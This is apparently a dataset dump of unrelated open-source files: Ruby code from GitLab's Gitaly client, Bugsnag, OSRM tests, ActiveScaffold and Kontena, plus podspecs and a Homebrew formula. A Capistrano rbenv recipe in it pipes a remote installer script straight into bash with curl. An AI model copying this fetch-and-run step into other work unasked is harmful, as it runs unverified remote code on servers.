# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
# s.dependency 'AFNetworking', '~> 2.3'
end
| 32.981481 | 96 | 0.637282 |
ed1409cf2f4903797ab364cb4708066b0fe429e0 | 158 | require 'test_helper'
# Smoke test: the engine's top-level namespace loads and is a Module.
class IvaldiContentBuilder::Test < ActiveSupport::TestCase
test "truth" do
assert_kind_of Module, IvaldiContentBuilder
end
end
| 19.75 | 58 | 0.791139 |
919078501a7baeba850cec6a8d5e572a574a9fd9 | 3,377 | require 'socket'
require 'open3'
require 'json'
# Only one isntance of osrm-routed is ever launched, to avoid collisions.
# The default is to keep osrm-routed running and load data with datastore.
# however, osrm-routed it shut down and relaunched for each scenario thats
# loads data directly.
class OSRMLoader
# Shared plumbing for launching, monitoring and stopping the single
# osrm-routed process. @@pid holds its PID, shared across loader classes.
class OSRMBaseLoader
@@pid = nil
# Starts osrm-routed and blocks until it accepts TCP connections,
# raising RoutedError if that takes longer than LAUNCH_TIMEOUT.
def launch
Timeout.timeout(LAUNCH_TIMEOUT) do
osrm_up
wait_for_connection
end
rescue Timeout::Error
raise RoutedError.new "Launching osrm-routed timed out."
end
# Stops osrm-routed, escalating to SIGKILL if it does not exit within
# SHUTDOWN_TIMEOUT.
def shutdown
Timeout.timeout(SHUTDOWN_TIMEOUT) do
osrm_down
end
rescue Timeout::Error
kill
raise RoutedError.new "Shutting down osrm-routed timed out."
end
# True while the spawned process is still running.
# NOTE(review): implicitly returns nil (falsy) when nothing was spawned.
def osrm_up?
if @@pid
begin
if Process.waitpid(@@pid, Process::WNOHANG) then
false
else
true
end
rescue Errno::ESRCH, Errno::ECHILD
false
end
end
end
# Politely terminates the process (TERMSIGNAL) and waits for it to exit.
def osrm_down
if @@pid
Process.kill TERMSIGNAL, @@pid
wait_for_shutdown
@@pid = nil
end
end
# Forceful SIGKILL, used after a graceful shutdown timed out.
def kill
if @@pid
Process.kill 'KILL', @@pid
end
end
# Polls (100ms steps) until a TCP connection to OSRM_PORT succeeds.
def wait_for_connection
while true
begin
socket = TCPSocket.new('127.0.0.1', OSRM_PORT)
return
rescue Errno::ECONNREFUSED
sleep 0.1
end
end
end
# Busy-waits (10ms steps) until the process has exited.
def wait_for_shutdown
while osrm_up?
sleep 0.01
end
end
end
# looading data directly when lauching osrm-routed:
# under this scheme, osmr-routed is launched and shutdown for each scenario,
# and osrm-datastore is not used
class OSRMDirectLoader < OSRMBaseLoader
# Runs +block+ with osrm-routed serving +input_file+ directly, restarting
# the daemon around each scenario.
def load world, input_file, &block
@world = world
@input_file = input_file
Dir.chdir TEST_FOLDER do
shutdown
launch
yield
shutdown
end
end
def osrm_up
return if @@pid
@@pid = Process.spawn("#{LOAD_LIBRARIES}#{BIN_PATH}/osrm-routed #{@input_file} --port #{OSRM_PORT}",:out=>OSRM_ROUTED_LOG_FILE, :err=>OSRM_ROUTED_LOG_FILE)
Process.detach(@@pid) # avoid zombie processes
end
end
# looading data with osrm-datastore:
# under this scheme, osmr-routed is launched once and kept running for all scenarios,
# and osrm-datastore is used to load data for each scenario
class OSRMDatastoreLoader < OSRMBaseLoader
# Loads +input_file+ via osrm-datastore, reusing one long-running
# shared-memory osrm-routed instance across scenarios.
def load world, input_file, &block
@world = world
@input_file = input_file
Dir.chdir TEST_FOLDER do
load_data
launch unless @@pid
yield
end
end
def load_data
run_bin "osrm-datastore", @input_file
end
def osrm_up
return if osrm_up?
@@pid = Process.spawn("#{LOAD_LIBRARIES}#{BIN_PATH}/osrm-routed --shared-memory=1 --port #{OSRM_PORT}",:out=>OSRM_ROUTED_LOG_FILE, :err=>OSRM_ROUTED_LOG_FILE)
Process.detach(@@pid) # avoid zombie processes
end
end
# Entry point: picks the loader implementation from the world's @load_method
# ('datastore' or 'directly') and delegates to it.
def self.load world, input_file, &block
method = world.instance_variable_get "@load_method"
if method == 'datastore'
OSRMDatastoreLoader.new.load world, input_file, &block
elsif method == 'directly'
OSRMDirectLoader.new.load world, input_file, &block
else
raise "*** Unknown load method '#{method}'"
end
end
end
| 24.471014 | 164 | 0.632514 |
ac2db99ee01b8a1a40c1d63d5678de56e83c69c0 | 11,691 | # frozen_string_literal: true
module Gitlab
module GitalyClient
class RefService
include Gitlab::EncodingHelper
# 'repository' is a Gitlab::Git::Repository
def initialize(repository)
@repository = repository
@gitaly_repo = repository.gitaly_repository
@storage = repository.storage
end
# All local branches, via Gitaly's FindAllBranches RPC.
def branches
request = Gitaly::FindAllBranchesRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_all_branches, request, timeout: GitalyClient.fast_timeout)
consume_find_all_branches_response(response)
end
# Branches of the named remote, via FindAllRemoteBranches.
def remote_branches(remote_name)
request = Gitaly::FindAllRemoteBranchesRequest.new(repository: @gitaly_repo, remote_name: remote_name)
response = GitalyClient.call(@storage, :ref_service, :find_all_remote_branches, request, timeout: GitalyClient.medium_timeout)
consume_find_all_remote_branches_response(remote_name, response)
end
# Merged branches only; optionally restricted to +branch_names+ (encoded as
# binary because git ref names are raw bytes, not valid UTF-8).
def merged_branches(branch_names = [])
request = Gitaly::FindAllBranchesRequest.new(
repository: @gitaly_repo,
merged_only: true,
merged_branches: branch_names.map { |s| encode_binary(s) }
)
response = GitalyClient.call(@storage, :ref_service, :find_all_branches, request, timeout: GitalyClient.fast_timeout)
consume_find_all_branches_response(response)
end
# Name of the default branch, stripped of its ref prefix.
def default_branch_name
request = Gitaly::FindDefaultBranchNameRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_default_branch_name, request, timeout: GitalyClient.fast_timeout)
Gitlab::Git.branch_name(response.name)
end
# All branch names, stripped of their ref prefix.
def branch_names
request = Gitaly::FindAllBranchNamesRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_all_branch_names, request, timeout: GitalyClient.fast_timeout)
consume_refs_response(response) { |name| Gitlab::Git.branch_name(name) }
end
# All tag names, stripped of their ref prefix.
def tag_names
request = Gitaly::FindAllTagNamesRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_all_tag_names, request, timeout: GitalyClient.fast_timeout)
consume_refs_response(response) { |name| Gitlab::Git.tag_name(name) }
end
# Finds the name of a ref with the given prefix that contains +commit_id+.
def find_ref_name(commit_id, ref_prefix)
request = Gitaly::FindRefNameRequest.new(
repository: @gitaly_repo,
commit_id: commit_id,
prefix: ref_prefix
)
response = GitalyClient.call(@storage, :ref_service, :find_ref_name, request, timeout: GitalyClient.medium_timeout)
encode!(response.name.dup)
end
def list_new_commits(newrev)
request = Gitaly::ListNewCommitsRequest.new(
repository: @gitaly_repo,
commit_id: newrev
)
commits = []
response = GitalyClient.call(@storage, :ref_service, :list_new_commits, request, timeout: GitalyClient.medium_timeout)
response.each do |msg|
msg.commits.each do |c|
commits << Gitlab::Git::Commit.new(@repository, c)
end
end
commits
end
def list_new_blobs(newrev, limit = 0, dynamic_timeout: nil)
request = Gitaly::ListNewBlobsRequest.new(
repository: @gitaly_repo,
commit_id: newrev,
limit: limit
)
timeout =
if dynamic_timeout
[dynamic_timeout, GitalyClient.medium_timeout].min
else
GitalyClient.medium_timeout
end
response = GitalyClient.call(@storage, :ref_service, :list_new_blobs, request, timeout: timeout)
response.flat_map do |msg|
# Returns an Array of Gitaly::NewBlobObject objects
# Available methods are: #size, #oid and #path
msg.new_blob_objects
end
end
def count_tag_names
tag_names.count
end
def count_branch_names
branch_names.count
end
def local_branches(sort_by: nil, pagination_params: nil)
request = Gitaly::FindLocalBranchesRequest.new(repository: @gitaly_repo, pagination_params: pagination_params)
request.sort_by = sort_by_param(sort_by) if sort_by
response = GitalyClient.call(@storage, :ref_service, :find_local_branches, request, timeout: GitalyClient.fast_timeout)
consume_find_local_branches_response(response)
end
def tags
request = Gitaly::FindAllTagsRequest.new(repository: @gitaly_repo)
response = GitalyClient.call(@storage, :ref_service, :find_all_tags, request, timeout: GitalyClient.medium_timeout)
consume_tags_response(response)
end
def ref_exists?(ref_name)
request = Gitaly::RefExistsRequest.new(repository: @gitaly_repo, ref: encode_binary(ref_name))
response = GitalyClient.call(@storage, :ref_service, :ref_exists, request, timeout: GitalyClient.fast_timeout)
response.value
rescue GRPC::InvalidArgument => e
raise ArgumentError, e.message
end
def find_branch(branch_name)
request = Gitaly::FindBranchRequest.new(
repository: @gitaly_repo,
name: encode_binary(branch_name)
)
response = GitalyClient.call(@repository.storage, :ref_service, :find_branch, request, timeout: GitalyClient.medium_timeout)
branch = response.branch
return unless branch
target_commit = Gitlab::Git::Commit.decorate(@repository, branch.target_commit)
Gitlab::Git::Branch.new(@repository, encode!(branch.name.dup), branch.target_commit.id, target_commit)
end
def delete_refs(refs: [], except_with_prefixes: [])
request = Gitaly::DeleteRefsRequest.new(
repository: @gitaly_repo,
refs: refs.map { |r| encode_binary(r) },
except_with_prefix: except_with_prefixes.map { |r| encode_binary(r) }
)
response = GitalyClient.call(@repository.storage, :ref_service, :delete_refs, request, timeout: GitalyClient.medium_timeout)
raise Gitlab::Git::Repository::GitError, response.git_error if response.git_error.present?
end
# Limit: 0 implies no limit, thus all tag names will be returned
def tag_names_contains_sha(sha, limit: 0)
request = Gitaly::ListTagNamesContainingCommitRequest.new(
repository: @gitaly_repo,
commit_id: sha,
limit: limit
)
response = GitalyClient.call(@storage, :ref_service, :list_tag_names_containing_commit, request, timeout: GitalyClient.medium_timeout)
consume_ref_contains_sha_response(response, :tag_names)
end
# Limit: 0 implies no limit, thus all tag names will be returned
def branch_names_contains_sha(sha, limit: 0)
request = Gitaly::ListBranchNamesContainingCommitRequest.new(
repository: @gitaly_repo,
commit_id: sha,
limit: limit
)
response = GitalyClient.call(@storage, :ref_service, :list_branch_names_containing_commit, request, timeout: GitalyClient.medium_timeout)
consume_ref_contains_sha_response(response, :branch_names)
end
def get_tag_messages(tag_ids)
request = Gitaly::GetTagMessagesRequest.new(repository: @gitaly_repo, tag_ids: tag_ids)
messages = Hash.new { |h, k| h[k] = +''.b }
current_tag_id = nil
response = GitalyClient.call(@storage, :ref_service, :get_tag_messages, request, timeout: GitalyClient.fast_timeout)
response.each do |rpc_message|
current_tag_id = rpc_message.tag_id if rpc_message.tag_id.present?
messages[current_tag_id] << rpc_message.message
end
messages
end
def pack_refs
request = Gitaly::PackRefsRequest.new(repository: @gitaly_repo)
GitalyClient.call(@storage, :ref_service, :pack_refs, request, timeout: GitalyClient.long_timeout)
end
private
def consume_refs_response(response)
response.flat_map { |message| message.names.map { |name| yield(name) } }
end
def sort_by_param(sort_by)
sort_by = 'name' if sort_by == 'name_asc'
enum_value = Gitaly::FindLocalBranchesRequest::SortBy.resolve(sort_by.upcase.to_sym)
raise ArgumentError, "Invalid sort_by key `#{sort_by}`" unless enum_value
enum_value
end
def consume_find_local_branches_response(response)
response.flat_map do |message|
message.branches.map do |gitaly_branch|
Gitlab::Git::Branch.new(
@repository,
encode!(gitaly_branch.name.dup),
gitaly_branch.commit_id,
commit_from_local_branches_response(gitaly_branch)
)
end
end
end
def consume_find_all_branches_response(response)
response.flat_map do |message|
message.branches.map do |branch|
target_commit = Gitlab::Git::Commit.decorate(@repository, branch.target)
Gitlab::Git::Branch.new(@repository, branch.name, branch.target.id, target_commit)
end
end
end
def consume_find_all_remote_branches_response(remote_name, response)
remote_name += '/' unless remote_name.ends_with?('/')
response.flat_map do |message|
message.branches.map do |branch|
target_commit = Gitlab::Git::Commit.decorate(@repository, branch.target_commit)
branch_name = branch.name.sub(remote_name, '')
Gitlab::Git::Branch.new(@repository, branch_name, branch.target_commit.id, target_commit)
end
end
end
def consume_tags_response(response)
response.flat_map do |message|
message.tags.map { |gitaly_tag| Gitlab::Git::Tag.new(@repository, gitaly_tag) }
end
end
def commit_from_local_branches_response(response)
# Git messages have no encoding enforcements. However, in the UI we only
# handle UTF-8, so basically we cross our fingers that the message force
# encoded to UTF-8 is readable.
message = response.commit_subject.dup.force_encoding('UTF-8')
# NOTE: For ease of parsing in Gitaly, we have only the subject of
# the commit and not the full message. This is ok, since all the
# code that uses `local_branches` only cares at most about the
# commit message.
# TODO: Once gitaly "takes over" Rugged consider separating the
# subject from the message to make it clearer when there's one
# available but not the other.
hash = {
id: response.commit_id,
message: message,
authored_date: Time.at(response.commit_author.date.seconds),
author_name: response.commit_author.name.dup,
author_email: response.commit_author.email.dup,
committed_date: Time.at(response.commit_committer.date.seconds),
committer_name: response.commit_committer.name.dup,
committer_email: response.commit_committer.email.dup
}
Gitlab::Git::Commit.decorate(@repository, hash)
end
def consume_ref_contains_sha_response(stream, collection_name)
stream.each_with_object([]) do |response, array|
encoded_names = response.send(collection_name).map { |b| Gitlab::Git.ref_name(b) } # rubocop:disable GitlabSecurity/PublicSend
array.concat(encoded_names)
end
end
def invalid_ref!(message)
raise Gitlab::Git::Repository::InvalidRef, message
end
end
end
end
| 38.97 | 145 | 0.673082 |
115b99c33fff5cbc0394aaf7aa308c4c24319d34 | 3,600 | module ActiveScaffold::DataStructures::Association
class Abstract
def initialize(association)
@association = association
end
attr_writer :reverse
delegate :name, :foreign_key, :==, to: :@association
def allow_join?
!polymorphic?
end
def klass
@association.klass unless polymorphic?
end
def belongs_to?
@association.macro == :belongs_to
end
def has_one?
@association.macro == :has_one
end
def has_many?
@association.macro == :has_many
end
def habtm?
@association.macro == :has_and_belongs_to_many
end
def singular?
!collection?
end
def through?
false
end
def polymorphic?
false
end
def readonly?
false
end
def through_reflection; end
def source_reflection; end
def scope; end
def respond_to_target?
false
end
def counter_cache_hack?
false
end
def quoted_table_name
raise "define quoted_table_name method in #{self.class.name} class"
end
def quoted_primary_key
raise "define quoted_primary_key method in #{self.class.name} class"
end
def reverse(klass = nil)
unless polymorphic? || defined?(@reverse)
@reverse ||= inverse || get_reverse&.name
end
@reverse || (get_reverse(klass)&.name unless klass.nil?)
end
def inverse_for?(klass)
inverse_class = reverse_association(klass)&.inverse_klass
inverse_class.present? && (inverse_class == klass || klass < inverse_class)
end
def reverse_association(klass = nil)
assoc = if polymorphic?
get_reverse(klass) unless klass.nil?
else
return unless reverse_name = reverse(klass)
reflect_on_association(reverse_name)
end
self.class.new(assoc) if assoc
end
protected
def reflect_on_association(name)
@association.klass.reflect_on_association(name)
end
def get_reverse(klass = nil)
return nil if klass.nil? && polymorphic?
# name-based matching (association name vs self.active_record.to_s)
matches = reverse_matches(klass || self.klass)
if matches.length > 1
matches.select! do |assoc|
inverse_klass.name.underscore.include? assoc.name.to_s.pluralize.singularize
end
end
matches.first
end
def reverse_matches(klass)
associations = self.class.reflect_on_all_associations(klass)
# collect associations that point back to this model and use the same foreign_key
associations.each_with_object([]) do |assoc, reverse_matches|
reverse_matches << assoc if reverse_match? assoc
end
end
def reverse_match?(assoc)
return false if assoc == @association
return false unless assoc.polymorphic? || assoc.class_name == inverse_klass&.name
if through?
reverse_through_match?(assoc)
elsif habtm?
reverse_habtm_match?(assoc)
else
reverse_direct_match?(assoc)
end
end
def reverse_through_match?(assoc); end
def reverse_habtm_match?(assoc)
assoc.macro == :has_and_belongs_to_many
end
def reverse_direct_match?(assoc)
# skip over has_and_belongs_to_many associations
return false if assoc.macro == :has_and_belongs_to_many
if foreign_key.is_a?(Array) || assoc.foreign_key.is_a?(Array) # composite_primary_keys
assoc.foreign_key == foreign_key
else
assoc.foreign_key.to_sym == foreign_key.to_sym
end
end
end
end
| 23.684211 | 92 | 0.655 |
623d64448d514bd407e21892a7fcb58ca7f2ec92 | 1,445 | class Kontena::Cli::GridCommand < Kontena::Command
subcommand ["list","ls"], "List all grids", load_subcommand('grids/list_command')
subcommand "create", "Create a new grid", load_subcommand('grids/create_command')
subcommand "update", "Update grid", load_subcommand('grids/update_command')
subcommand "use", "Switch to use specific grid", load_subcommand('grids/use_command')
subcommand "show", "Show grid details", load_subcommand('grids/show_command')
subcommand "logs", "Show logs from grid containers", load_subcommand('grids/logs_command')
subcommand "events", "Show events from grid", load_subcommand('grids/events_command')
subcommand ["remove","rm"], "Remove a grid", load_subcommand('grids/remove_command')
subcommand "current", "Show current grid details", load_subcommand('grids/current_command')
subcommand "env", "Show the current grid environment details", load_subcommand('grids/env_command')
subcommand "audit-log", "Show audit log of the current grid", load_subcommand('grids/audit_log_command')
subcommand "user", "User specific commands", load_subcommand('grids/user_command')
subcommand "cloud-config", "Generate cloud-config", load_subcommand('grids/cloud_config_command')
subcommand "trusted-subnet", "Trusted subnet related commands", load_subcommand('grids/trusted_subnet_command')
subcommand "health", "Check grid health", load_subcommand('grids/health_command')
def execute
end
end
| 65.681818 | 113 | 0.76955 |
5d2c6f3dbf20b4497a58d5557e965069d800dc42 | 435 | # vim: syntax=ruby:expandtab:shiftwidth=2:softtabstop=2:tabstop=2
#
# Copyright (c) 2016-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree. An additional grant
# of patent rights can be found in the PATENTS file in the same directory.
#
default['fb_hdparm'] = {
'enforce' => false,
'settings' => {},
}
| 29 | 77 | 0.724138 |
6a42567b69abd79e48541f127c409a3b9dc409ac | 6,712 | require "rubygems"
require "thread"
require "bugsnag/version"
require "bugsnag/configuration"
require "bugsnag/meta_data"
require "bugsnag/report"
require "bugsnag/cleaner"
require "bugsnag/helpers"
require "bugsnag/session_tracker"
require "bugsnag/delivery"
require "bugsnag/delivery/synchronous"
require "bugsnag/delivery/thread_queue"
# Rack is not bundled with the other integrations
# as it doesn't auto-configure when loaded
require "bugsnag/integrations/rack"
require "bugsnag/middleware/rack_request"
require "bugsnag/middleware/warden_user"
require "bugsnag/middleware/clearance_user"
require "bugsnag/middleware/callbacks"
require "bugsnag/middleware/rails3_request"
require "bugsnag/middleware/sidekiq"
require "bugsnag/middleware/mailman"
require "bugsnag/middleware/rake"
require "bugsnag/middleware/callbacks"
require "bugsnag/middleware/classify_error"
module Bugsnag
LOCK = Mutex.new
INTEGRATIONS = [:resque, :sidekiq, :mailman, :delayed_job, :shoryuken, :que]
class << self
##
# Configure the Bugsnag notifier application-wide settings.
#
# Yields a configuration object to use to set application settings.
def configure(validate_api_key=true)
yield(configuration) if block_given?
check_key_valid if validate_api_key
end
##
# Explicitly notify of an exception.
#
# Optionally accepts a block to append metadata to the yielded report.
def notify(exception, auto_notify=false, &block)
unless auto_notify.is_a? TrueClass or auto_notify.is_a? FalseClass
configuration.warn("Adding metadata/severity using a hash is no longer supported, please use block syntax instead")
auto_notify = false
end
if !configuration.auto_notify && auto_notify
configuration.debug("Not notifying because auto_notify is disabled")
return
end
if !configuration.valid_api_key?
configuration.debug("Not notifying due to an invalid api_key")
return
end
if !configuration.should_notify_release_stage?
configuration.debug("Not notifying due to notify_release_stages :#{configuration.notify_release_stages.inspect}")
return
end
if exception.respond_to?(:skip_bugsnag) && exception.skip_bugsnag
configuration.debug("Not notifying due to skip_bugsnag flag")
return
end
report = Report.new(exception, configuration, auto_notify)
# If this is an auto_notify we yield the block before the any middleware is run
yield(report) if block_given? && auto_notify
if report.ignore?
configuration.debug("Not notifying #{report.exceptions.last[:errorClass]} due to ignore being signified in auto_notify block")
return
end
# Run internal middleware
configuration.internal_middleware.run(report)
if report.ignore?
configuration.debug("Not notifying #{report.exceptions.last[:errorClass]} due to ignore being signified in internal middlewares")
return
end
# Store before_middleware severity reason for future reference
initial_severity = report.severity
initial_reason = report.severity_reason
# Run users middleware
configuration.middleware.run(report) do
if report.ignore?
configuration.debug("Not notifying #{report.exceptions.last[:errorClass]} due to ignore being signified in user provided middleware")
return
end
# If this is not an auto_notify then the block was provided by the user. This should be the last
# block that is run as it is the users "most specific" block.
yield(report) if block_given? && !auto_notify
if report.ignore?
configuration.debug("Not notifying #{report.exceptions.last[:errorClass]} due to ignore being signified in user provided block")
return
end
# Test whether severity has been changed and ensure severity_reason is consistant in auto_notify case
if report.severity != initial_severity
report.severity_reason = {
:type => Report::USER_CALLBACK_SET_SEVERITY
}
else
report.severity_reason = initial_reason
end
# Deliver
configuration.info("Notifying #{configuration.endpoint} of #{report.exceptions.last[:errorClass]}")
options = {:headers => report.headers}
payload = ::JSON.dump(Bugsnag::Helpers.trim_if_needed(report.as_json))
Bugsnag::Delivery[configuration.delivery_method].deliver(configuration.endpoint, payload, configuration, options)
end
end
##
# Returns the client's Configuration object, or creates one if not yet created.
def configuration
@configuration = nil unless defined?(@configuration)
@configuration || LOCK.synchronize { @configuration ||= Bugsnag::Configuration.new }
end
##
# Returns the client's SessionTracker object, or creates one if not yet created.
def session_tracker
@session_tracker = nil unless defined?(@session_tracker)
@session_tracker || LOCK.synchronize { @session_tracker ||= Bugsnag::SessionTracker.new}
end
##
# Starts a session.
#
# Allows Bugsnag to track error rates across releases.
def start_session
session_tracker.start_session
end
##
# Allow access to "before notify" callbacks as an array.
#
# These callbacks will be called whenever an error notification is being made.
def before_notify_callbacks
Bugsnag.configuration.request_data[:before_callbacks] ||= []
end
# Attempts to load all integrations through auto-discovery
def load_integrations
require "bugsnag/integrations/railtie" if defined?(Rails::Railtie)
INTEGRATIONS.each do |integration|
begin
require "bugsnag/integrations/#{integration}"
rescue LoadError
end
end
end
# Load a specific integration
def load_integration(integration)
integration = :railtie if integration == :rails
if INTEGRATIONS.include?(integration) || integration == :railtie
require "bugsnag/integrations/#{integration}"
else
configuration.debug("Integration #{integration} is not currently supported")
end
end
# Check if the API key is valid and warn (once) if it is not
def check_key_valid
@key_warning = false unless defined?(@key_warning)
if !configuration.valid_api_key? && !@key_warning
configuration.warn("No valid API key has been set, notifications will not be sent")
@key_warning = true
end
end
end
end
Bugsnag.load_integrations unless ENV["BUGSNAG_DISABLE_AUTOCONFIGURE"]
| 35.141361 | 143 | 0.706794 |
1c5f48977d3fd57d099bae12780534bec3a84660 | 1,852 | Capistrano::Configuration.instance(true).load do
set_default :ruby_version, "2.0.0-p195"
# set_default :rbenv_bootstrap, "bootstrap-ubuntu-11-10"
namespace :rbenv do
desc "Install rbenv, Ruby, and the Bundler gem"
task :install, roles: :app do
run "#{sudo} apt-get -y install curl git-core"
run "curl -L https://raw.github.com/fesplugas/rbenv-installer/master/bin/rbenv-installer | bash"
bashrc = <<-BASHRC
if [ -d $HOME/.rbenv ]; then
export PATH="$HOME/.rbenv/bin:$PATH"
eval "$(rbenv init -)"
fi
BASHRC
put bashrc, "/tmp/rbenvrc"
run "cat /tmp/rbenvrc ~/.bashrc > ~/.bashrc.tmp"
run "mv ~/.bashrc.tmp ~/.bashrc"
run %q{export PATH="$HOME/.rbenv/bin:$PATH"}
run %q{eval "$(rbenv init -)"}
run "#{sudo} apt-get -y install build-essential"
run "#{sudo} apt-get -y install zlib1g-dev libssl-dev"
run "#{sudo} apt-get -y install libreadline-gplv2-dev"
rbenv.install_ruby
run "gem install bundler --no-ri --no-rdoc"
run "rbenv rehash"
end
desc "Upgrade rbenv"
task :upgrade, roles: :app do
run "cd ~/.rbenv; git pull"
run "cd ~/.rbenv/plugins/ruby-build; git pull"
end
desc "Install ruby"
task :install_ruby, roles: :app do
run "export RUBY_GC_MALLOC_LIMIT=60000000; export RUBY_FREE_MIN=200000" #"; curl https://raw.github.com/gist/4637375/rbenv.sh | sh "
# run "curl https://raw.github.com/gist/1688857/2-#{ruby_version}-patched.sh > /tmp/#{ruby_version}-perf"
# run "rbenv install /tmp/#{ruby_version}-perf"
run "rbenv install -f #{ruby_version}"
run "rbenv global #{ruby_version}"
run "gem install bundler --no-ri --no-rdoc"
run "rbenv rehash"
end
after "cap_vps:prepare", "rbenv:install"
before "rbenv:install_ruby", "rbenv:upgrade"
end
end
| 36.313725 | 138 | 0.638769 |
21f1e34d400f74fd38f6b98b40571f373adb51ca | 1,280 | class Gocryptfs < Formula
desc "Encrypted overlay filesystem written in Go"
homepage "https://nuetzlich.net/gocryptfs/"
url "https://github.com/rfjakob/gocryptfs/releases/download/v2.0.1/gocryptfs_v2.0.1_src-deps.tar.gz"
sha256 "31be3f3a9400bd5eb8a4d5f86f7aee52a488207e12d312f2601ae08e7e26dd02"
license "MIT"
bottle do
sha256 cellar: :any_skip_relocation, x86_64_linux: "43d8cf09fcd4cb76ac51246225cd30c68ea4abe9c944843a9788534e09ea9e18"
end
depends_on "go" => :build
depends_on "pkg-config" => :build
depends_on "[email protected]"
on_macos do
disable! date: "2021-04-08", because: "requires closed-source macFUSE"
end
on_linux do
depends_on "libfuse"
end
def install
system "./build.bash"
bin.install "gocryptfs"
end
def caveats
on_macos do
<<~EOS
The reasons for disabling this formula can be found here:
https://github.com/Homebrew/homebrew-core/pull/64491
An external tap may provide a replacement formula. See:
https://docs.brew.sh/Interesting-Taps-and-Forks
EOS
end
end
test do
(testpath/"encdir").mkpath
pipe_output("#{bin}/gocryptfs -init #{testpath}/encdir", "password", 0)
assert_predicate testpath/"encdir/gocryptfs.conf", :exist?
end
end
| 27.234043 | 121 | 0.7125 |
621175fbbf95a3dcc99d27753e91811a3a74e8cb | 5,187 | #
# Be sure to run `pod spec lint NetworkTool.podspec' to ensure this is a
# valid spec and to remove all comments including this before submitting the spec.
#
# To learn more about Podspec attributes see http://docs.cocoapods.org/specification.html
# To see working Podspecs in the CocoaPods repo see https://github.com/CocoaPods/Specs/
#
Pod::Spec.new do |s|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# These will help people to find your library, and whilst it
# can feel like a chore to fill in it's definitely to your advantage. The
# summary should be tweet-length, and the description more in depth.
#
s.name = "NetworkTool"
s.version = "1.0.0"
s.summary = "Network tools."
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
基于Alamofire、HandyJSON、RxSwift的网络工具
DESC
s.homepage = "https://coding.net/u/zhaofengYue/p/NetworkTool"
# s.screenshots = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Licensing your code is important. See http://choosealicense.com for more info.
# CocoaPods will detect a license file if there is a named LICENSE*
# Popular ones are 'MIT', 'BSD' and 'Apache License, Version 2.0'.
#
s.license = "MIT"
#s.license = { :type => "MIT", :file => "License" }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the authors of the library, with email addresses. Email addresses
# of the authors are extracted from the SCM log. E.g. $ git log. CocoaPods also
# accepts just a name if you'd rather not provide an email address.
#
# Specify a social_media_url where others can refer to, for example a twitter
# profile URL.
#
s.author = { "zhaofengYue" => "[email protected]" }
# Or just: s.author = "zhaofengYue"
# s.authors = { "zhaofengYue" => "[email protected]" }
# s.social_media_url = "http://twitter.com/zhaofengYue"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If this Pod runs only on iOS or OS X, then specify the platform and
# the deployment target. You can optionally include the target after the platform.
#
s.platform = :ios, "8.0"
# s.platform = :ios, "5.0"
# When using multiple platforms
# s.ios.deployment_target = "5.0"
# s.osx.deployment_target = "10.7"
# s.watchos.deployment_target = "2.0"
# s.tvos.deployment_target = "9.0"
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Specify the location from where the source should be retrieved.
# Supports git, hg, bzr, svn and HTTP.
#
s.source = { :git => "https://git.coding.net/zhaofengYue/NetworkTool.git", :tag => "#{s.version}" }
# ――― Source Code ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# CocoaPods is smart about how it includes source code. For source files
# giving a folder will include any swift, h, m, mm, c & cpp files.
# For header files it will include any header in the folder.
# Not including the public_header_files will make all headers public.
#
s.source_files = "NetworkTool/NetworkTool/*.{swift,h,m}"
#s.exclude_files = "Classes/Exclude"
# s.public_header_files = "Classes/**/*.h"
# ――― Resources ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# A list of resources included with the Pod. These are copied into the
# target bundle with a build phase script. Anything else will be cleaned.
# You can preserve files from being cleaned, please don't preserve
# non-essential files like tests, examples and documentation.
#
# s.resource = "icon.png"
# s.resources = "Resources/*.png"
# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = "SomeFramework"
# s.frameworks = "SomeFramework", "AnotherFramework"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
s.dependency "HandyJSON"
s.dependency "Alamofire"
s.dependency "RxCocoa"
s.dependency "RxSwift"
end
| 36.528169 | 107 | 0.597262 |
d56d06c853c3dfd74a579343bdd44836bd013499 | 594 | class ContactController < ApplicationController
def index
@contact = Contact.new
end
def new
@user = current_user
@contact = Contact.new
end
def create
@contact = Contact.new(params[:contact])
if @contact.valid?
render action: 'new'
end
end
def contact_send
@contact = Contact.new contact_params
ContactUsMailer.contact_us_email(@contact).deliver
redirect_to '/about', notice: "Your message was sent. Adventure is on its way!"
end
protected
def contact_params
params.require(:contact).permit(:name, :email, :message)
end
end | 21.214286 | 83 | 0.69697 |
386d6e737bde7e386cd68bdae26f8a41302f548c | 64 | module Sprockets
module Rails
VERSION = "3.1.1"
end
end
| 10.666667 | 21 | 0.65625 |
